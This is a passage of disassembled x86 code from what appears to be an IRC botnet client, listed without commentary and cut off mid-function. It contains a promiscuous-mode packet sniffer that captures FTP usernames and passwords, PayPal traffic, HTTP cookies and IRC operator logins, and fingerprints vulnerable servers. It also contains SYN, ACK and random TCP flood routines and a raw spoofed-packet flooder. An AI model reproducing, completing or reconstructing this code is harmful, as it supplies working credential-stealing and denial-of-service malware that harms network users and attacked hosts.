pop ecx
jnz short loc_4151FC
push offset a_login_1 ; ":.Login"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4151FC
push offset a_ident ; ":.ident"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4151FC
push offset aIdent_0 ; ":!ident"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz loc_4151FC
push offset a_hashin ; ":.hashin"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz loc_4151FC
push offset aHashin ; ":!hashin"
push esi ; Str
call _strstr
pop ecx
pop ecx
test eax, eax
setnz al
pop esi
retn
sub_41519E endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4152B5(char *Str)
sub_4152B5 proc near ; CODE XREF: sub_41549E:loc_41573C�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aIrcSniff ; "IRC sniff"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_4152CF
loc_4152CB: ; CODE XREF: sub_4152B5+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_4152CF: ; CODE XREF: sub_4152B5+14�j
push offset a_fast_ ; "#.fast.#"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4152CB
push offset aOper ; "OPER "
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_4152F5
loc_4152F1: ; CODE XREF: sub_4152B5+4F�j
; sub_4152B5+60�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4152F5: ; CODE XREF: sub_4152B5+3A�j
push offset aNick_1 ; "NICK "
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4152F1
push offset aOper_0 ; "oper "
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4152F1
push offset aYouAreNowAnIrc ; "You are now an IRC Operator"
push esi ; Str
call _strstr
pop ecx
pop ecx
test eax, eax
setnz al
pop esi
retn
sub_4152B5 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41532B(char *Str)
sub_41532B proc near ; CODE XREF: sub_41549E:loc_415766�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aFtpSniff ; "FTP sniff"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_415345
loc_415341: ; CODE XREF: sub_41532B+29�j
; sub_41532B+3A�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_415345: ; CODE XREF: sub_41532B+14�j
push offset a_fast_ ; "#.fast.#"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_415341
push offset aNick_1 ; "NICK "
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_415341
push offset a220 ; "220 "
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_41537C
loc_415378: ; CODE XREF: sub_41532B+60�j
; sub_41532B+71�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_41537C: ; CODE XREF: sub_41532B+4B�j
push offset a230 ; "230 "
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_415378
push offset aUser_2 ; "USER "
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_415378
push offset aPass_1 ; "PASS "
push esi ; Str
call _strstr
pop ecx
pop ecx
test eax, eax
setnz al
pop esi
retn
sub_41532B endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4153B2(char *Str)
sub_4153B2 proc near ; CODE XREF: sub_41549E+2F9�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aHttpSniff ; "HTTP sniff"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_4153CC
loc_4153C8: ; CODE XREF: sub_4153B2+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_4153CC: ; CODE XREF: sub_4153B2+14�j
push offset a_fast_ ; "#.fast.#"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4153C8
push offset aPaypal ; "paypal"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_4153F2
loc_4153EE: ; CODE XREF: sub_4153B2+4F�j
; sub_4153B2+60�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4153F2: ; CODE XREF: sub_4153B2+3A�j
push offset aPaypal_0 ; "PAYPAL"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4153EE
push offset aPaypal_com ; "PAYPAL.COM"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4153EE
push offset aPaypal_com_0 ; "paypal.com"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_4153EE
push offset aSetCookie ; "Set-Cookie:"
push esi ; Str
call _strstr
pop ecx
pop ecx
test eax, eax
setnz al
pop esi
retn
sub_4153B2 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_415439(char *Str)
sub_415439 proc near ; CODE XREF: sub_41549E:loc_4157F7�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aVulnSniff ; "VULN sniff"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_415453
loc_41544F: ; CODE XREF: sub_415439+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_415453: ; CODE XREF: sub_415439+14�j
push offset a_fast_ ; "#.fast.#"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_41544F
push offset aOpenssl0_9_6 ; "OpenSSL/0.9.6"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_415479
loc_415475: ; CODE XREF: sub_415439+4F�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_415479: ; CODE XREF: sub_415439+3A�j
push offset aServUFtpServer ; "Serv-U FTP Server"
push esi ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_415475
push offset aOpenssh_2 ; "OpenSSH_2"
push esi ; Str
call _strstr
pop ecx
pop ecx
test eax, eax
setnz al
pop esi
retn
sub_415439 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41549E proc near ; DATA XREF: sub_40274D+3F80�o
Dst = byte ptr -113B8h
var_113AF = byte ptr -113AFh
var_113AC = dword ptr -113ACh
var_113A8 = dword ptr -113A8h
var_113A4 = dword ptr -113A4h
Str = byte ptr -1138Ch
var_13B8 = byte ptr -13B8h
var_BB8 = byte ptr -0BB8h
var_3B8 = byte ptr -3B8h
var_3B7 = byte ptr -3B7h
Dest = byte ptr -2B8h
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov eax, 113B8h
lea ebp, [esp-74h]
call __alloca_probe
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_B8]
rep movsd
xor esi, esi
push 3Fh
inc esi
mov [eax+90h], esi
xor ebx, ebx
pop ecx
xor eax, eax
mov [ebp+74h+var_3B8], bl
lea edi, [ebp+74h+var_3B7]
rep stosd
stosw
push 0FFh
lea eax, [ebp+74h+var_3B8]
push eax
mov [ebp+74h+var_20], 2
mov [ebp+74h+var_1E], bx
mov [ebp+74h+var_1C], ebx
call dword_444220 ; gethostname
lea eax, [ebp+74h+var_3B8]
push eax
call dword_444168 ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx ; Size
push dword ptr [eax] ; Src
lea eax, [ebp+74h+var_8]
push eax ; Dst
call _memcpy
mov eax, [ebp+74h+var_8]
add esp, 0Ch
push ebx
push 3
push 2
mov [ebp+74h+var_1C], eax
call dword_444100 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+74h+var_10], edi
jnz short loc_415546
pop edi
pop esi
xor eax, eax
pop ebx
add ebp, 74h
leave
retn 4
; ---------------------------------------------------------------------------
loc_415546: ; CODE XREF: sub_41549E+9A�j
push 10h
lea eax, [ebp+74h+var_20]
push eax
push edi
call dword_4441E4 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_41557A
call dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+74h+Dest]
push offset asc_435680 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_2C], ebx
jnz short loc_4155D6
jmp short loc_4155BC
; ---------------------------------------------------------------------------
loc_41557A: ; CODE XREF: sub_41549E+B8�j
push ebx
push ebx
lea eax, [ebp+74h+var_24]
push eax
push ebx
push ebx
push 4
lea eax, [ebp+74h+var_C]
push eax
push 98000001h
push edi
mov [ebp+74h+var_C], esi
call dword_4441E0 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4155FA
call dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+74h+Dest]
push offset asc_435650 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+74h+var_2C], ebx
jnz short loc_4155D6
loc_4155BC: ; CODE XREF: sub_41549E+DA�j
push ebx ; int
push [ebp+74h+var_30] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_B4]
push eax ; Str
push [ebp+74h+var_B8] ; int
call sub_40123B
add esp, 14h
loc_4155D6: ; CODE XREF: sub_41549E+D8�j
; sub_41549E+11C�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
pop ecx
push edi
call dword_444218 ; closesocket
push [ebp+74h+var_34]
call sub_40B149
pop ecx
push ebx
call ds:dword_42B068 ; ExitThread
loc_4155FA: ; CODE XREF: sub_41549E+FC�j
mov esi, 200h
loc_4155FF: ; CODE XREF: sub_41549E+190�j
; sub_41549E+1B6�j ...
mov edi, 0FFFFh
push edi ; Size
lea eax, [ebp+74h+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push ebx
push edi
lea eax, [ebp+74h+Dst]
push eax
push [ebp+74h+var_10]
call dword_444064 ; recv
cmp [ebp+74h+var_113AF], 6
jnz short loc_4155FF
push [ebp+74h+var_113A4]
call ds:dword_42B1D8 ; htons
push [ebp+74h+var_113A4+2]
movzx edi, ax
call ds:dword_42B1D8 ; htons
cmp edi, 6Eh
movzx eax, ax
mov [ebp+74h+arg_0], eax
jz short loc_4155FF
cmp edi, 19h
jz short loc_4155FF
cmp eax, 6Eh
jz short loc_4155FF
cmp eax, 19h
jz short loc_4155FF
mov eax, [ebp+74h+var_113AC]
push eax
mov dword_4D5270, eax
call ds:dword_42B1DC ; inet_ntoa
push eax
lea eax, [ebp+74h+var_13B8]
push offset aS ; "%s"
push eax ; Dest
call _sprintf
mov eax, [ebp+74h+var_113A8]
add esp, 0Ch
push eax
mov dword_4D5270, eax
call ds:dword_42B1DC ; inet_ntoa
push eax
lea eax, [ebp+74h+var_BB8]
push offset aS ; "%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+74h+Str]
push eax ; Str
mov [ebp+74h+var_4], ebx
call _strlen
add esp, 10h
test eax, eax
jle short loc_4156F5
loc_4156C6: ; CODE XREF: sub_41549E+255�j
mov eax, [ebp+74h+var_4]
lea eax, [ebp+eax+74h+Str]
cmp byte ptr [eax], 0Dh
jnz short loc_4156D8
mov byte ptr [eax], 20h
loc_4156D8: ; CODE XREF: sub_41549E+235�j
cmp byte ptr [eax], 0Ah
jnz short loc_4156E0
mov byte ptr [eax], 20h
loc_4156E0: ; CODE XREF: sub_41549E+23D�j
inc [ebp+74h+var_4]
lea eax, [ebp+74h+Str]
push eax ; Str
call _strlen
cmp [ebp+74h+var_4], eax
pop ecx
jl short loc_4156C6
loc_4156F5: ; CODE XREF: sub_41549E+226�j
cmp edi, 50h
jz loc_415790
cmp [ebp+74h+arg_0], 50h
jz loc_415790
lea eax, [ebp+74h+Str]
push eax ; Str
call sub_41519E
test al, al
pop ecx
lea eax, [ebp+74h+Str]
push eax ; Str
jz short loc_41573C
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_BB8]
push eax
push edi
lea eax, [ebp+74h+var_13B8]
push eax
push offset unk_43561C
jmp loc_4157BF
; ---------------------------------------------------------------------------
loc_41573C: ; CODE XREF: sub_41549E+280�j
call sub_4152B5
test al, al
pop ecx
lea eax, [ebp+74h+Str]
push eax ; Str
jz short loc_415766
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_BB8]
push eax
push edi
lea eax, [ebp+74h+var_13B8]
push eax
push offset unk_4355E8
jmp short loc_4157BF
; ---------------------------------------------------------------------------
loc_415766: ; CODE XREF: sub_41549E+2AD�j
call sub_41532B
test al, al
pop ecx
jz short loc_415790
lea eax, [ebp+74h+Str]
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_BB8]
push eax
push edi
lea eax, [ebp+74h+var_13B8]
push eax
push offset unk_4355B4
jmp short loc_4157BF
; ---------------------------------------------------------------------------
loc_415790: ; CODE XREF: sub_41549E+25A�j
; sub_41549E+264�j ...
lea eax, [ebp+74h+Str]
push eax ; Str
call sub_4153B2
test al, al
pop ecx
lea eax, [ebp+74h+Str]
push eax
jz short loc_4157F7
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_BB8]
push eax
push edi
lea eax, [ebp+74h+var_13B8]
push eax
push offset asc_43557C ; "-"
loc_4157BF: ; CODE XREF: sub_41549E+299�j
; sub_41549E+2C6�j ...
lea eax, [ebp+74h+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 20h
cmp [ebp+74h+var_2C], ebx
jnz loc_4155FF
push ebx ; int
push [ebp+74h+var_30] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_B4]
push eax ; Str
push [ebp+74h+var_B8] ; int
call sub_40123B
add esp, 14h
jmp loc_4155FF
; ---------------------------------------------------------------------------
loc_4157F7: ; CODE XREF: sub_41549E+308�j
call sub_415439
test al, al
pop ecx
jz loc_4155FF
lea eax, [ebp+74h+Str]
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_BB8]
push eax
push edi
lea eax, [ebp+74h+var_13B8]
push eax
push offset unk_435544
jmp short loc_4157BF
sub_41549E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=64h
; int __cdecl sub_415825(int,int,char *Str1,int,int)
sub_415825 proc near ; CODE XREF: sub_415B7C+40�p
var_288 = byte ptr -288h
Dest = byte ptr -0F8h
var_B8 = word ptr -0B8h
var_B6 = word ptr -0B6h
var_B4 = dword ptr -0B4h
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_94 = byte ptr -94h
var_88 = byte ptr -88h
Dst = byte ptr -80h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
Src = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Str1 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-64h]
sub esp, 288h
push ebx
push edi
push 0Eh
pop ecx
xor eax, eax
xor ebx, ebx
mov [ebp+64h+var_A8], bl
lea edi, [ebp+64h+var_A7]
rep stosd
stosw
stosb
lea eax, [ebp+64h+var_288]
push eax
push 202h
call dword_444110 ; WSAStartup
test eax, eax
jz short loc_415861
xor eax, eax
jmp loc_415B75
; ---------------------------------------------------------------------------
loc_415861: ; CODE XREF: sub_415825+33�j
xor edi, edi
inc edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_444074 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+64h+var_18], eax
jz loc_415B6D
push 4
lea ecx, [ebp+64h+var_44]
push ecx
push 2
push ebx
push eax
mov [ebp+64h+var_44], edi
call dword_444120 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_415B64
push esi
push [ebp+64h+arg_C]
mov [ebp+64h+var_B8], 2
call dword_444260 ; htons
mov esi, [ebp+64h+arg_0]
push 28h
mov [ebp+64h+var_B6], ax
mov [ebp+64h+var_B4], esi
mov [ebp+64h+var_2C], 45h
call dword_444260 ; htons
push [ebp+64h+arg_C]
mov [ebp+64h+var_2A], ax
mov [ebp+64h+var_28], di
mov [ebp+64h+var_26], bx
mov [ebp+64h+var_24], 80h
mov [ebp+64h+var_23], 6
mov [ebp+64h+var_22], bx
mov [ebp+64h+var_1C], esi
call dword_444260 ; htons
mov [ebp+64h+var_12], ax
call _rand
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_444260 ; htons
push 12345678h
mov [ebp+64h+var_14], ax
call dword_444234 ; htonl
push offset aDdos_syn ; "ddos.syn"
push [ebp+64h+Str1] ; Str1
mov [ebp+64h+var_10], eax
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_415931
mov [ebp+64h+var_C], ebx
mov [ebp+64h+var_7], 2
jmp short loc_415985
; ---------------------------------------------------------------------------
loc_415931: ; CODE XREF: sub_415825+101�j
push offset aDdos_ack ; "ddos.ack"
push [ebp+64h+Str1] ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_41594D
mov [ebp+64h+var_C], ebx
mov [ebp+64h+var_7], 10h
jmp short loc_415985
; ---------------------------------------------------------------------------
loc_41594D: ; CODE XREF: sub_415825+11D�j
push offset aDdos_random ; "ddos.random"
push [ebp+64h+Str1] ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_415985
call _rand
cdq
push 3
pop ecx
idiv ecx
mov [ebp+64h+var_C], edx
call _rand
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+64h+var_7], dl
loc_415985: ; CODE XREF: sub_415825+10A�j
; sub_415825+126�j ...
push 4000h
mov [ebp+64h+var_8], 50h
call dword_444260 ; htons
mov [ebp+64h+var_6], ax
lea eax, [ebp+64h+var_6C]
push eax
mov [ebp+64h+var_2], bx
mov [ebp+64h+var_30], ebx
call ds:dword_42B0DC ; QueryPerformanceFrequency
lea eax, [ebp+64h+var_38]
push eax
call ds:dword_42B0D8 ; QueryPerformanceCounter
push [ebp+64h+var_68]
mov eax, [ebp+64h+arg_10]
push [ebp+64h+var_6C]
cdq
push edx
push eax
call __allmul
add eax, [ebp+64h+var_38]
mov [ebp+64h+var_4], bx
adc edx, [ebp+64h+var_34]
mov [ebp+64h+var_40], eax
mov [ebp+64h+var_3C], edx
call _rand
cdq
mov ecx, 3E9h
idiv ecx
mov edi, 3E8h
add edx, edi
push edx
call dword_444260 ; htons
mov [ebp+64h+var_14], ax
call _rand
call _rand
push eax
call dword_444260 ; htons
push [ebp+64h+arg_4]
movzx eax, ax
mov [ebp+64h+var_10], eax
call dword_444234 ; htonl
push 14h
pop esi
jmp short loc_415A7D
; ---------------------------------------------------------------------------
loc_415A18: ; CODE XREF: sub_415825+30C�j
add [ebp+64h+var_30], eax
lea eax, [ebp+64h+var_38]
push eax
call ds:dword_42B0D8 ; QueryPerformanceCounter
mov eax, [ebp+64h+var_34]
cmp eax, [ebp+64h+var_3C]
jg loc_415B60
jl short loc_415A3F
mov eax, [ebp+64h+var_38]
cmp eax, [ebp+64h+var_40]
jnb loc_415B60
loc_415A3F: ; CODE XREF: sub_415825+20C�j
mov [ebp+64h+var_4], bx
call _rand
cdq
mov ecx, 3E9h
idiv ecx
add edx, edi
push edx
call dword_444260 ; htons
mov [ebp+64h+var_14], ax
call _rand
call _rand
push eax
call dword_444260 ; htons
push [ebp+64h+arg_4]
movzx eax, ax
mov [ebp+64h+var_10], eax
call dword_444234 ; htonl
loc_415A7D: ; CODE XREF: sub_415825+1F1�j
inc [ebp+64h+arg_4]
mov [ebp+64h+var_20], eax
mov eax, [ebp+64h+var_1C]
push esi
mov [ebp+64h+var_60], eax
mov [ebp+64h+var_5C], bl
mov [ebp+64h+var_5B], 6
call dword_444260 ; htons
mov [ebp+64h+var_5A], ax
mov eax, [ebp+64h+var_20]
mov [ebp+64h+Src], eax
lea eax, [ebp+64h+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+64h+var_A8]
push eax ; Dst
call _memcpy
lea eax, [ebp+64h+var_14]
push esi ; Size
push eax ; Src
lea eax, [ebp+64h+var_88]
push eax ; Dst
call _memcpy
lea eax, [ebp+64h+var_A8]
push 34h
push eax
call sub_402422
mov [ebp+64h+var_4], ax
lea eax, [ebp+64h+var_2C]
push esi ; Size
push eax ; Src
lea eax, [ebp+64h+var_A8]
push eax ; Dst
call _memcpy
lea eax, [ebp+64h+var_14]
push esi ; Size
push eax ; Src
lea eax, [ebp+64h+var_94]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+64h+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+64h+var_A8]
push 28h
push eax
call sub_402422
mov [ebp+64h+var_22], ax
lea eax, [ebp+64h+var_2C]
push esi ; Size
push eax ; Src
lea eax, [ebp+64h+var_A8]
push eax ; Dst
call _memcpy
add esp, 14h
push 10h
lea eax, [ebp+64h+var_B8]
push eax
push ebx
push 28h
lea eax, [ebp+64h+var_A8]
push eax
push [ebp+64h+var_18]
call dword_4440CC ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_415A18
call dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+64h+Dest]
push offset asc_4356AC ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+64h+Dest]
push eax
call sub_417D70
add esp, 10h
jmp short loc_415B63
; ---------------------------------------------------------------------------
loc_415B60: ; CODE XREF: sub_415825+206�j
; sub_415825+214�j
mov ebx, [ebp+64h+var_30]
loc_415B63: ; CODE XREF: sub_415825+339�j
pop esi
loc_415B64: ; CODE XREF: sub_415825+73�j
push [ebp+64h+var_18]
call dword_444218 ; closesocket
loc_415B6D: ; CODE XREF: sub_415825+57�j
call dword_444224 ; WSACleanup
mov eax, ebx
loc_415B75: ; CODE XREF: sub_415825+37�j
pop edi
pop ebx
add ebp, 64h
leave
retn
sub_415825 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_415B7C(int,char *Str,char *Str1,int)
sub_415B7C proc near ; CODE XREF: sub_415BD8+4F�p
arg_0 = dword ptr 4
Str = dword ptr 8
Str1 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_4022BD
push [esp+10h+Str] ; Str
mov esi, eax
call j__atol
push [esp+14h+arg_C] ; Str
mov ebx, eax
call j__atol
mov edi, eax
call _rand
cdq
mov ecx, 200h
idiv ecx
push edi ; int
push ebx ; int
push [esp+20h+Str1] ; Str1
lea eax, [edx+esi+100h]
push eax ; int
push esi ; int
call sub_415825
add esp, 20h
test eax, eax
jnz short loc_415BC9
inc eax
loc_415BC9: ; CODE XREF: sub_415B7C+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_415B7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_415BD8 proc near ; DATA XREF: sub_40274D+6235�o
Dest = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = dword ptr -18Ch
Str = byte ptr -10Ch
Str1 = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 0A5h
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
lea eax, [ebp+var_18C]
push eax ; int
lea eax, [ebp+Str1]
push eax ; Str1
lea eax, [ebp+var_20C]
push eax ; Str
lea eax, [ebp+var_28C]
push eax ; int
call sub_415B7C
push eax
lea eax, [ebp+Dest]
push offset asc_4356C8 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 20h
cmp [ebp+var_8], esi
jnz short loc_415C68
push esi ; int
push [ebp+var_C] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_294] ; int
call sub_40123B
add esp, 14h
loc_415C68: ; CODE XREF: sub_415BD8+6E�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
push [ebp+var_290]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_415BD8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_415C89 proc near ; DATA XREF: sub_40274D+642D�o
Dest = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
Str = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 3BCh
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 68h
pop ecx
push 0FFh
mov esi, eax
xor ebx, ebx
push 3
lea edi, [ebp+74h+var_1BC]
rep movsd
inc ebx
push 2
mov [eax+19Ch], ebx
call dword_444100 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jnz short loc_415CF2
call dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+74h+Dest]
push offset asc_4357D4 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
xor edi, edi
loc_415CE4: ; CODE XREF: sub_415C89+9E�j
; sub_415C89+C5�j ...
cmp [ebp+74h+var_24], edi
jnz loc_415F2D
jmp loc_415F10
; ---------------------------------------------------------------------------
loc_415CF2: ; CODE XREF: sub_415C89+3C�j
push 4
lea ecx, [ebp+74h+var_C]
push ecx
push 2
xor edi, edi
push edi
push eax
mov [ebp+74h+var_C], ebx
call dword_444120 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_415D29
call dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+74h+Dest]
push offset asc_4357A4 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_415CE4
; ---------------------------------------------------------------------------
loc_415D29: ; CODE XREF: sub_415C89+81�j
lea eax, [ebp+74h+var_1B8]
push eax
call dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_415D50
lea eax, [ebp+74h+Dest]
push offset asc_435784 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_415CE4
; ---------------------------------------------------------------------------
loc_415D50: ; CODE XREF: sub_415C89+B0�j
push 10h ; Size
lea eax, [ebp+74h+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push edi
mov [ebp+74h+Dst], 2
call dword_444260 ; htons
mov [ebp+74h+var_1A], ax
lea eax, [ebp+74h+var_1B8]
push eax
call dword_44417C ; inet_addr
mov esi, ds:dword_42B038
mov [ebp+74h+var_18], eax
mov [ebp+74h+arg_0], edi
call esi ; GetTickCount
mov [ebp+74h+var_8], eax
jmp loc_415EB1
; ---------------------------------------------------------------------------
loc_415D93: ; CODE XREF: sub_415C89+239�j
push 41Ch
mov byte_4D5278, 45h
call dword_444260 ; htons
cmp [ebp+74h+var_2C], edi
mov word_4D527A, ax
mov word_4D527C, bx
mov word_4D527E, di
mov byte_4D5280, 80h
mov byte_4D5281, bl
mov word_4D5282, di
jz short loc_415E02
call _rand
mov ebx, eax
shl ebx, 8
call _rand
add ebx, eax
shl ebx, 8
call _rand
add ebx, eax
shl ebx, 8
call _rand
add ebx, eax
mov dword_4D5284, ebx
xor ebx, ebx
inc ebx
jmp short loc_415E1A
; ---------------------------------------------------------------------------
loc_415E02: ; CODE XREF: sub_415C89+147�j
push [ebp+74h+var_1BC]
call sub_4023C9
pop ecx
push eax
call dword_44417C ; inet_addr
mov dword_4D5284, eax
loc_415E1A: ; CODE XREF: sub_415C89+177�j
mov eax, [ebp+74h+var_18]
mov dword_4D5288, eax
call _rand
cdq
mov ecx, 100h
idiv ecx
mov byte_4D528C, dl
call _rand
cdq
mov ecx, 100h
idiv ecx
mov byte_4D528D, dl
call _rand
cdq
mov ecx, 0F0h
idiv ecx
push 400h ; Size
mov word_4D528E, di
mov word_4D5292, bx
